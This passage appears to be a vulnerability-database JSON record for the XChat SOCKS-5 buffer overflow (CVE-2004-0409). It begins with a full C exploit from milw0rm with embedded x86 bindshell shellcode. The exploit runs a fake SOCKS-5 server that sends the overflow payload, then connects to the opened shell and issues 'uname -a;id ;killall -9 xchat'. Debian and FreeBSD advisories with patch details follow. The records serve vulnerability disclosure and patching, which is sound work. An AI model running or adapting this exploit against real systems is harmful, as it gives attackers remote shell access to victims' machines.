X-Chat, but still keep the bindshell alive/active. when searching *\r\n * for the correct offset, use increments of 100(100,200,300,...). *\r\n **********************************************************************/\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <strings.h>\r\n#include <signal.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/time.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#define BUFSIZE 255\r\n#define BSEADDR 0xbffffffa\r\n#define DFLPORT 1080\r\n#define DFLSPRT 7979\r\n#define TIMEOUT 5\r\nstatic char x86_exec[]= /* bindshell(??), netric based. */\r\n \"\\x31\\xc0\\x50\\x40\\x89\\xc3\\x50\\x40\\x50\\x89\\xe1\\xb0\\x66\"\r\n \"\\xcd\\x80\\x31\\xd2\\x52\\x66\\x68\\x00\\x00\\x43\\x66\\x53\\x89\"\r\n \"\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x40\\x89\"\r\n \"\\x44\\x24\\x04\\x43\\x43\\xb0\\x66\\xcd\\x80\\x83\\xc4\\x0c\\x52\"\r\n \"\\x52\\x43\\xb0\\x66\\xcd\\x80\\x93\\x89\\xd1\\xb0\\x3f\\xcd\\x80\"\r\n \"\\x41\\x80\\xf9\\x03\\x75\\xf6\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\"\r\n \"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\"\r\n \"\\x80\";\r\nchar *getcode(unsigned int);\r\nchar *socks5_bind(unsigned short,unsigned int);\r\nvoid getshell(char *,unsigned short);\r\nvoid printe(char *,short);\r\nvoid sig_alarm(){printe(\"alarm/timeout hit.\",1);}\r\nint main(int argc,char **argv){\r\n unsigned short port=DFLPORT,sport=DFLSPRT;\r\n unsigned int retaddr=BSEADDR;\r\n char *hostptr;\r\n if(BUFSIZE<0||BUFSIZE>255)printe(\"BUFSIZE must be 1-255(char/int8).\",1);\r\n printf(\"[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp\"\r\n \"loit.\\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\\n\\n\");\r\n if(argc<2){\r\n printf(\"[!] syntax: %s <offset from 0x%.8x> [port] [shell port]\\n\\n\",\r\n argv[0],BSEADDR);\r\n exit(1);\r\n }\r\n if(argc>1)retaddr-=atoi(argv[1]);\r\n if(argc>2)port=atoi(argv[2]);\r\n if(argc>3)sport=atoi(argv[3]);\r\n x86_exec[20]=(sport&0xff00)>>8;\r\n x86_exec[21]=(sport&0x00ff);\r\n printf(\"[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\\n\",\r\n retaddr,port,sport);\r\n hostptr=socks5_bind(port,retaddr);\r\n sleep(1);\r\n getshell(hostptr,sport);\r\n exit(0);\r\n}\r\nchar *getcode(unsigned int retaddr){\r\n unsigned char i=0;\r\n char *buf;\r\n if(!(buf=(char *)malloc(BUFSIZE+1)))\r\n printe(\"getcode(): allocating memory failed.\",1);\r\n memset(buf,0x90,BUFSIZE);\r\n for(i=0;i<64;i+=4){*(long *)&buf[i]=retaddr;}\r\n memcpy((buf+BUFSIZE-strlen(x86_exec)),x86_exec,strlen(x86_exec));\r\n return(buf);\r\n}\r\nchar *socks5_bind(unsigned short port,unsigned int retaddr){\r\n int ssock=0,sock=0,so=1;\r\n socklen_t salen=0;\r\n unsigned char *buf;\r\n struct sockaddr_in ssa,sa;\r\n ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);\r\n setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));\r\n#ifdef SO_REUSEPORT\r\n setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));\r\n#endif\r\n ssa.sin_family=AF_INET;\r\n ssa.sin_port=htons(port);\r\n ssa.sin_addr.s_addr=INADDR_ANY;\r\n printf(\"[*] awaiting connection from: *:%d.\\n\",port);\r\n if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)\r\n printe(\"could not bind socket.\",1);\r\n listen(ssock,2);\r\n bzero((char*)&sa,sizeof(struct sockaddr_in));\r\n salen=sizeof(sa);\r\n sock=accept(ssock,(struct sockaddr *)&sa,&salen);\r\n close(ssock);\r\n printf(\"[*] socks-5 server connection established.\\n\");\r\n if(!(buf=(unsigned char *)malloc(BUFSIZE+7+1)))\r\n printe(\"socks5_bind(): allocating memory failed.\",1);\r\n memcpy(buf,\"\\x05\\x00\\x05\\x00\\x00\\x03\",6);\r\n buf[6]=BUFSIZE;\r\n memcpy(buf+7,getcode(retaddr),BUFSIZE);\r\n printf(\"[*] sending specially crafted string. (exploit)\\n\");\r\n write(sock,buf,BUFSIZE+7);\r\n free(buf);\r\n sleep(1);\r\n close(sock);\r\n printf(\"[*] socks-5 server connection closed.\\n\");\r\n return(inet_ntoa(sa.sin_addr));\r\n}\r\nvoid getshell(char *hostname,unsigned short port){\r\n int sock,r;\r\n fd_set fds;\r\n char buf[4096+1];\r\n struct hostent *he;\r\n struct sockaddr_in sa;\r\n printf(\"[*] checking to see if the exploit was successful.\\n\");\r\n if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)\r\n printe(\"getshell(): socket() failed.\",1);\r\n sa.sin_family=AF_INET;\r\n if((sa.sin_addr.s_addr=inet_addr(hostname))){\r\n if(!(he=gethostbyname(hostname)))\r\n printe(\"getshell(): couldn't resolve.\",1);\r\n memcpy((char *)&sa.sin_addr,(char *)he->h_addr,\r\n sizeof(sa.sin_addr));\r\n }\r\n sa.sin_port=htons(port);\r\n signal(SIGALRM,sig_alarm);\r\n alarm(TIMEOUT);\r\n printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port);\r\n if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){\r\n printf(\"[!] connection failed: %s:%d.\\n\",hostname,port);\r\n return;\r\n }\r\n alarm(0);\r\n printf(\"[*] successfully connected: %s:%d.\\n\\n\",hostname,port);\r\n signal(SIGINT,SIG_IGN);\r\n write(sock,\"uname -a;id ;killall -9 xchat\\n\",30);\r\n while(1){\r\n FD_ZERO(&fds);\r\n FD_SET(0,&fds);\r\n FD_SET(sock,&fds);\r\n if(select(sock+1,&fds,0,0,0)<1)\r\n printe(\"getshell(): select() failed.\",1);\r\n if(FD_ISSET(0,&fds)){\r\n if((r=read(0,buf,4096))<1)\r\n printe(\"getshell(): read() failed.\",1);\r\n if(write(sock,buf,r)!=r)\r\n printe(\"getshell(): write() failed.\",1);\r\n }\r\n if(FD_ISSET(sock,&fds)){\r\n if((r=read(sock,buf,4096))<1)\r\n exit(0);\r\n write(1,buf,r);\r\n }\r\n }\r\n close(sock);\r\n return;\r\n}\r\nvoid printe(char *err,short e){\r\n printf(\"[!] %s\\n\",err);\r\n if(e)exit(1);\r\n return;\r\n}\r\n\n\n// milw0rm.com [2004-05-05]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/296/"}], "debian": [{"lastseen": "2020-11-11T13:25:47", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0409"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 493-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 21st, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : xchat\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2004-0409\nDebian Bug : 244184\n\nA buffer overflow has been discovered in the Socks-5 proxy code of\nXChat, an IRC client for X similar to AmIRC. This allows an attacker\nto execute arbitrary code on the users' machine.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 1.8.9-0woody3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 2.0.8-1.\n\nWe recommend that you upgrade your xchat and related packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3.dsc\n Size/MD5 checksum: 877 80161873b2e115faa33cd38000645dce\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3.diff.gz\n Size/MD5 checksum: 18200 215990506f737d853b23911843a68b41\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9.orig.tar.gz\n Size/MD5 checksum: 1310151 05701f0c567ce1ece6577c69f146e6b3\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat-common_1.8.9-0woody3_all.deb\n Size/MD5 checksum: 598110 9a586950e3db6f9ebee14c9637d8d61a\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_alpha.deb\n Size/MD5 checksum: 223084 90b4e3be1d3ef7ec25231e72ebc1130b\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_alpha.deb\n Size/MD5 checksum: 229794 d26d9de27c8567e3dffb483c5174df02\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_alpha.deb\n Size/MD5 checksum: 122376 3d69e44fff6af517f8f166bb750b6c4a\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_arm.deb\n Size/MD5 checksum: 179850 656145636a317c8ab847183ee68c3337\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_arm.deb\n Size/MD5 checksum: 186350 d25c11fe60901dfdd128e46d5e3e88e1\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_arm.deb\n Size/MD5 checksum: 92846 d207049438e8eaf61a342c69112addec\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_i386.deb\n Size/MD5 checksum: 168598 3a9cb05afb7a7e4c7c77d4979aa24470\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_i386.deb\n Size/MD5 checksum: 174968 1bdf20e898c3ee9fd268c1207ed1901c\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_i386.deb\n Size/MD5 checksum: 87394 8d11e3d2a13e73a5c3bc8d1f751244e9\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_ia64.deb\n Size/MD5 checksum: 289266 7322e0d408f74a9c68eb582db9828585\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_ia64.deb\n Size/MD5 checksum: 297118 b70f1cc13747a01d96a266a7d08c00bc\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_ia64.deb\n Size/MD5 checksum: 149788 96e423bd9ec333b9a2b106a4c870f8d5\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_hppa.deb\n Size/MD5 checksum: 207100 71997ea804e37ab7fb6293db978b4ef2\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_hppa.deb\n Size/MD5 checksum: 213642 d7987c5011d5bc3611e6464e918c401d\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_hppa.deb\n Size/MD5 checksum: 107238 37c42b96721e8f3875a9cd0407c157cc\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_m68k.deb\n Size/MD5 checksum: 157760 427f7bb644140e438f5df3768099753d\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_m68k.deb\n Size/MD5 checksum: 165064 5447693913028bf26cf7a9c7182a78e2\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_m68k.deb\n Size/MD5 checksum: 82208 6229d6b8e40e7ecdf4f98be89211cd55\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_mips.deb\n Size/MD5 checksum: 194996 2df78a22d4eb4c730bfe929f885f31eb\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_mips.deb\n Size/MD5 checksum: 200876 eca41c98214dc3f8d99be1efe7edd73c\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_mips.deb\n Size/MD5 checksum: 104438 20f57a03806e1b78d4cb2d2ba9551a13\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_mipsel.deb\n Size/MD5 checksum: 192936 9c93014ec994684379e884e27bcbf602\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_mipsel.deb\n Size/MD5 checksum: 198400 f60a58cba1bb2f38c9c34a1bfd53a702\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_mipsel.deb\n Size/MD5 checksum: 103356 2dffd5defbe8bc940eaf9bdace649182\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_powerpc.deb\n Size/MD5 checksum: 184834 8ce64505fe3157d915a7240c0ab5e22a\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_powerpc.deb\n Size/MD5 checksum: 191582 73971bd2a49f071c3ebeaee72832550d\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_powerpc.deb\n Size/MD5 checksum: 98256 a3548189c57565b3c5c243870550a26f\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_s390.deb\n Size/MD5 checksum: 182596 7ad31d7bef7cf4863f7e87f336ffe08a\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_s390.deb\n Size/MD5 checksum: 189590 41cdf6dbb7906474fa757c5a490f05de\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_s390.deb\n Size/MD5 checksum: 94964 ac501925c362d92b1d87fc712bdae944\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/x/xchat/xchat_1.8.9-0woody3_sparc.deb\n Size/MD5 checksum: 180672 1749044dd1a8e02232e086fc660d5654\n http://security.debian.org/pool/updates/main/x/xchat/xchat-gnome_1.8.9-0woody3_sparc.deb\n Size/MD5 checksum: 186952 00a868cd3c240165059d7aeed792ab20\n http://security.debian.org/pool/updates/main/x/xchat/xchat-text_1.8.9-0woody3_sparc.deb\n Size/MD5 checksum: 95146 d094ced15db96ad34b417f3213f31808\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2004-04-21T00:00:00", "published": "2004-04-21T00:00:00", "id": "DEBIAN:DSA-493-1:C476E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00093.html", "title": "[SECURITY] [DSA 493-1] New xchat packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:17", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0409"], "description": "\nA straightforward stack buffer overflow exists in XChat's\n\t Socks5 proxy support.\nThe XChat developers report that `tsifra' discovered this\n\t issue.\nNOTE: XChat Socks5 support is disabled by support in the\n\t FreeBSD Ports Collection.\n", "edition": 4, "modified": "2004-05-03T00:00:00", "published": "2004-04-05T00:00:00", "id": "8338A20F-9573-11D8-9366-0020ED76EF5A", "href": "https://vuxml.freebsd.org/freebsd/8338a20f-9573-11d8-9366-0020ed76ef5a.html", "title": "xchat remotely exploitable buffer overflow (Socks5)", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}